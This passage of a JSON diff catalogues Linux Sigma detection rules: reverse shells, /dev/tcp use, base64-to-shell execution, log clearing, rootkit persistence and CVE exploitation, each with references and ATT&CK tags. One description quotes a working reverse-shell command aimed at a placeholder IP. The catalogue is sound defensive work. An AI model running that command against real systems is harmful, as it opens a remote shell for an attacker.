"f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1", + "value": "Suspicious Log Entries", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_log_entries.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2017/03/25", + "filename": "lnx_shell_susp_log_entries.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell", + "uuid": "738d9bcf-6999-4fdb-b4ac-3033037db8ab", + "value": "Suspicious Reverse Shell Command Line", + "meta": { + "refs": [ + "https://alamot.github.io/reverse_shells/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_rev_shells.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ], + "creation_date": "2019/04/02", + "filename": "lnx_shell_susp_rev_shells.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects space after filename", + "uuid": "879c3015-c88b-4782-93d7-07adf92dbcb7", + "value": "Space After Filename", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1064", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_space_after_filename_.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2020/06/17", + "filename": "lnx_space_after_filename_.yml", + "author": "\u00d6mer G\u00fcnal", + "level": "low", + "falsepositive": [ + "Typos" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", + "uuid": "7fcc54cb-f27d-4684-84b7-436af096f858", + "value": "Sudo Privilege Escalation CVE-2019-14287 - Builtin", + "meta": { + "refs": [ + "https://www.openwall.com/lists/oss-security/2019/10/14/1", + "https://access.redhat.com/security/cve/cve-2019-14287", + "https://twitter.com/matthieugarin/status/1183970598210412546", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_sudo_cve_2019_14287_user.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "attack.t1548.003", + "cve.2019.14287" + ], + "creation_date": "2019/10/15", + "filename": "lnx_sudo_cve_2019_14287_user.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious command with /dev/tcp", + "uuid": "6cc5fceb-9a71-4c23-aeeb-963abe0b279c", + "value": "Suspicious Use of /dev/tcp", + "meta": { + "refs": [ + "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/", + "https://book.hacktricks.xyz/shells/shells/linux", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml" + ], + "tags": [ + "attack.reconnaissance" + ], + "creation_date": "2021/12/10", + "filename": "lnx_susp_dev_tcp.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious command sequence that JexBoss", + "uuid": "8ec2c8b4-557a-4121-b87c-5dfb3a602fae", + "value": "JexBoss Command Sequence", + "meta": { + "refs": [ + "https://www.us-cert.gov/ncas/analysis-reports/AR18-312A", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_jexboss.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ], + "creation_date": "2017/08/24", + "filename": "lnx_susp_jexboss.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd", + "uuid": "c67fc22a-0be5-4b4f-aad5-2b32c4b69523", + "value": "Symlink Etc Passwd", + "meta": { + "refs": [ + "https://www.qualys.com/2021/05/04/21nails/21nails.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_symlink_etc_passwd.yml" + ], + "tags": [ + "attack.t1204.001", + "attack.execution" + ], + "creation_date": "2019/04/05", + "filename": "lnx_symlink_etc_passwd.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects the creation of doas.conf file in linux host platform.", + "uuid": "00eee2a5-fdb0-4746-a21d-e43fbdea5681", + "value": "Linux Doas Conf File Creation", + "meta": { + "refs": [ + "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/", + "https://www.makeuseof.com/how-to-install-and-use-doas/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_doas_conf_creation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ], + "creation_date": "2022/01/20", + "filename": "file_create_lnx_doas_conf_creation.yml", + "author": "Sittikorn S, Teoderick Contreras", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_create", + "logsource.product": "linux" + } + }, + { + "description": "Detects creation of cron file or files in Cron directories which could indicates potential persistence.", + "uuid": "6c4e2f43-d94d-4ead-b64d-97e53fa2bd05", + "value": "Persistence Via Cron Files", + "meta": { + "refs": [ + "https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_persistence_cron_files.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.003" + ], + "creation_date": "2021/10/15", + "filename": "file_create_lnx_persistence_cron_files.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "level": "medium", + "falsepositive": [ + "Any legitimate cron file." + ], + "logsource.category": "file_create", + "logsource.product": "linux" + } + }, + { + "description": "Detects creation of sudoers file or files in \"sudoers.d\" directory which can be used a potential method to persiste privileges for a specific user.", + "uuid": "ddb26b76-4447-4807-871f-1b035b2bfa5d", + "value": "Persistence Via Sudoers Files", + "meta": { + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_persistence_sudoers_files.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.003" + ], + "creation_date": "2022/07/05", + "filename": "file_create_lnx_persistence_sudoers_files.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Creation of legitimate files in sudoers.d folder part of administrator work" + ], + "logsource.category": "file_create", + "logsource.product": "linux" + } + }, + { + "description": "Detects the creation of the file \"rootlog\" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.", + "uuid": "c0239255-822c-4630-b7f1-35362bcb8f44", + "value": "Triple Cross eBPF Rootkit Default LockFile", + "meta": { + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_triple_cross_rootkit_lock_file.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/07/05", + "filename": "file_create_lnx_triple_cross_rootkit_lock_file.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_create", + "logsource.product": "linux" + } + }, + { + "description": "Detects the creation of \"ebpfbackdoor\" files in both \"cron.d\" and \"sudoers.d\" directories. Which both are related to the TripleCross persistence method", + "uuid": "1a2ea919-d11d-4d1e-8535-06cda13be20f", + "value": "Triple Cross eBPF Rootkit Default Persistence", + "meta": { + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_triple_cross_rootkit_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1053.003" + ], + "creation_date": "2022/07/05", + "filename": "file_create_lnx_triple_cross_rootkit_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_create", + "logsource.product": "linux" + } + }, + { + "description": "Detects multiple blocks by the mod_security module (Web Application Firewall)", + "uuid": "a06eea10-d932-4aa6-8ba9-186df72c8d23", + "value": "Multiple Modsecurity Blocks", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/modsecurity/modsec_mulitple_blocks.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499" + ], + "creation_date": "2017/02/28", + "filename": "modsec_mulitple_blocks.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Vulnerability scanners", + "Frequent attacks if system faces Internet" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')", + "uuid": "83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871", + "value": "Linux Reverse Shell Indicator", + "meta": { + "refs": [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml" + ], + "tags": "No established tags", + "creation_date": "2021/10/16", + "filename": "net_connection_lnx_back_connect_shell_dev.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "linux" + } + }, + { + "description": "Detects process connections to a Monero crypto mining pool", + "uuid": "a46c93b7-55ed-4d27-a41b-c259456c4746", + "value": "Linux Crypto Mining Pool Connections", + "meta": { + "refs": [ + "https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml" + ], + "tags": "No established tags", + "creation_date": "2021/10/26", + "filename": "net_connection_lnx_crypto_mining_indicators.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of crypto miners" + ], + "logsource.category": "network_connection", + "logsource.product": "linux" + } + }, + { + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "uuid": "19bf6fdb-7721-4f3d-867f-53467f6a5db6", + "value": "Communication To Ngrok Tunneling Service - Linux", + "meta": { + "refs": [ + "https://twitter.com/hakluke/status/1587733971814977537/photo/1", + "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" + ], + "creation_date": "2022/11/03", + "filename": "net_connection_lnx_ngrok_tunnel.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of ngrok" + ], + "logsource.category": "network_connection", + "logsource.product": "linux" + } + }, + { + "description": "Detects relevant ClamAV messages", + "uuid": "36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb", + "value": "Relevant ClamAV Message", + "meta": { + "refs": [ + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_clamav.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.001" + ], + "creation_date": "2017/03/01", + "filename": "lnx_clamav.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects disabling security tools", + "uuid": "49f5dfc1-f92e-4d34-96fa-feba3f6acf36", + "value": "Disabling Security Tools - Builtin", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_security_tools_disabling_syslog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "creation_date": "2020/06/17", + "filename": "lnx_security_tools_disabling_syslog.yml", + "author": "\u00d6mer G\u00fcnal, Alejandro Ortuno, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects exploitation attempt using public exploit code for CVE-2018-15473", + "uuid": "4c9d903d-4939-4094-ade0-3cb748f4d7da", + "value": "SSHD Error Message CVE-2018-15473", + "meta": { + "refs": [ + "https://github.com/Rhynorater/CVE-2018-15473-Exploit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_ssh_cve_2018_15473.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1589" + ], + "creation_date": "2017/08/24", + "filename": "lnx_ssh_cve_2018_15473.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious failed logins with different user accounts from a single source system", + "uuid": "fc947f8e-ea81-4b14-9a7b-13f888f94e18", + "value": "Failed Logins with Different Accounts from Single Source - Linux", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_failed_logons_single_source.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ], + "creation_date": "2017/02/16", + "filename": "lnx_susp_failed_logons_single_source.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Workstations with frequently changing users" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious session with two users present", + "uuid": "1edd77db-0669-4fef-9598-165bda82826d", + "value": "Guacamole Two Users Sharing Session Anomaly", + "meta": { + "refs": [ + "https://research.checkpoint.com/2020/apache-guacamole-rce/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_guacamole.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212" + ], + "creation_date": "2020/07/03", + "filename": "lnx_susp_guacamole.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", + "uuid": "c8e35e96-19ce-4f16-aeb6-fd5588dc5365", + "value": "Suspicious Named Error", + "meta": { + "refs": [ + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_named.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2018/02/20", + "filename": "lnx_susp_named.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", + "uuid": "e76b413a-83d0-4b94-8e4c-85db4a5b8bdc", + "value": "Suspicious OpenSSH Daemon Error", + "meta": { + "refs": [ + "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c", + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_ssh.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2017/06/30", + "filename": "lnx_susp_ssh.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", + "uuid": "377f33a1-4b36-4ee1-acee-1dbe4b43cfbe", + "value": "Suspicious VSFTPD Error Messages", + "meta": { + "refs": [ + "https://github.com/dagwieers/vsftpd/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_vsftp.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2017/07/05", + "filename": "lnx_susp_vsftp.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects the use of at/atd which are utilities that are used to schedule tasks.\nThey are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code\n", + "uuid": "d2d642d7-b393-43fe-bae4-e81ed5915c4b", + "value": "Scheduled Task/Job At", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_at_command.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.002" + ], + "creation_date": "2020/10/06", + "filename": "proc_creation_lnx_at_command.yml", + "author": "\u00d6mer G\u00fcnal, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", + "uuid": "e2072cab-8c9a-459b-b63c-40ae79e27031", + "value": "Decode Base64 Encoded Text", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_lnx_base64_decode.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious process command line that uses base64 encoded input for execution with a shell", + "uuid": "ba592c6d-6888-43c3-b8c6-689b8fe47337", + "value": "Linux Base64 Encoded Pipe to Shell", + "meta": { + "refs": [ + "https://github.com/arget13/DDexec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ], + "creation_date": "2022/07/26", + "filename": "proc_creation_lnx_base64_execution.yml", + "author": "pH-T", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded", + "uuid": "fe2f9663-41cb-47e2-b954-8a228f3b9dff", + "value": "Linux Base64 Encoded Shebang In CLI", + "meta": { + "refs": [ + "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", + "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ], + "creation_date": "2022/09/15", + "filename": "proc_creation_lnx_base64_shebang_cli.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects the usage of the unsafe bpftrace option", + "uuid": "f8341cb2-ee25-43fa-a975-d8a5a9714b39", + "value": "BPFtrace Unsafe Option Usage", + "meta": { + "refs": [ + "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/", + "https://bpftrace.org/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ], + "creation_date": "2022/02/11", + "filename": "proc_creation_lnx_bpftrace_unsafe_option_usage.yml", + "author": "Andreas Hunkeler (@Karneades)", + "level": "medium", + "falsepositive": [ + "Legitimate usage of the unsafe option" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects the execution of a cat /etc/sudoers to list all users that have sudo rights", + "uuid": "0f79c4d2-4e1f-4683-9c36-b5469a665e06", + "value": "Cat Sudoers", + "meta": { + "refs": [ + "https://github.com/sleventyeleven/linuxprivchecker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1592.004" + ], + "creation_date": "2022/06/20", + "filename": "proc_creation_lnx_cat_sudoers.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects usage of the 'chattr' utility to remove immutable file attribute.", + "uuid": "34979410-e4b5-4e5d-8cfb-389fdff05c12", + "value": "Remove Immutable File Attribute", + "meta": { + "refs": [ + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ], + "creation_date": "2022/09/15", + "filename": "proc_creation_lnx_chattr_immutable_removal.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Administrator interacting with immutable files (e.g. for instance backups)." + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion", + "uuid": "80915f59-9b56-4616-9de0-fd0dea6c12fe", + "value": "Clear Linux Logs", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.002" + ], + "creation_date": "2020/10/07", + "filename": "proc_creation_lnx_clear_logs.yml", + "author": "\u00d6mer G\u00fcnal, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks", + "uuid": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31", + "value": "Commands to Clear or Remove the Syslog", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.002" + ], + "creation_date": "2021/10/15", + "filename": "proc_creation_lnx_clear_syslog.yml", + "author": "Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "level": "high", + "falsepositive": [ + "Log rotation." + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "uuid": "ec127035-a636-4b9a-8555-0efd4e59f316", + "value": "Clipboard Collection with Xclip Tool", + "meta": { + "refs": [ + "https://www.packetlabs.net/posts/clipboard-data-security/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ], + "creation_date": "2021/10/15", + "filename": "proc_creation_lnx_clipboard_collection.yml", + "author": "Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "level": "low", + "falsepositive": [ + "Legitimate usage of xclip tools." + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects usage of the 'crontab' utility to remove the current crontab.\nThis is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible\n", + "uuid": "c2e234de-03a3-41e1-b39a-1e56dc17ba67", + "value": "Remove Scheduled Cron Task/Job", + "meta": { + "refs": [ + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/09/15", + "filename": "proc_creation_lnx_crontab_removal.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects command line parameters or strings often used by crypto miners", + "uuid": "9069ea3c-b213-4c52-be13-86506a227ab1", + "value": "Linux Crypto Mining Indicators", + "meta": { + "refs": [ + "https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml" + ], + "tags": "No established tags", + "creation_date": "2021/10/26", + "filename": "proc_creation_lnx_crypto_mining.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of crypto miners" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server", + "uuid": "ea34fb97-e2c4-4afb-810f-785e4459b194", + "value": "Curl Usage on Linux", + "meta": { + "refs": [ + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/09/15", + "filename": "proc_creation_lnx_curl_usage.yml", + "author": "Nasreddine Bencherchali", + "level": "low", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134", + "uuid": "7fb14105-530e-4e2e-8cfb-99f7d8700b66", + "value": "Atlassian Confluence CVE-2022-26134", + "meta": { + "refs": [ + "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml" + ], + "tags": [ + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059", + "cve.2022.26134" + ], + "creation_date": "2022/06/03", + "filename": "proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective", + "uuid": "c8a5f584-cdc8-42cc-8cce-0398e4265de3", + "value": "Apache Spark Shell Command Injection - ProcessCreation", + "meta": { + "refs": [ + "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", + "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", + "https://github.com/apache/spark/pull/36315/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.33891" + ], + "creation_date": "2022/07/20", + "filename": "proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects potential overwriting and deletion of a file using DD.", + "uuid": "2953194b-e33c-4859-b9e8-05948c167447", + "value": "DD File Overwrite", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ], + "creation_date": "2021/10/15", + "filename": "proc_creation_lnx_dd_file_overwrite.yml", + "author": "Roberto Rodriguez 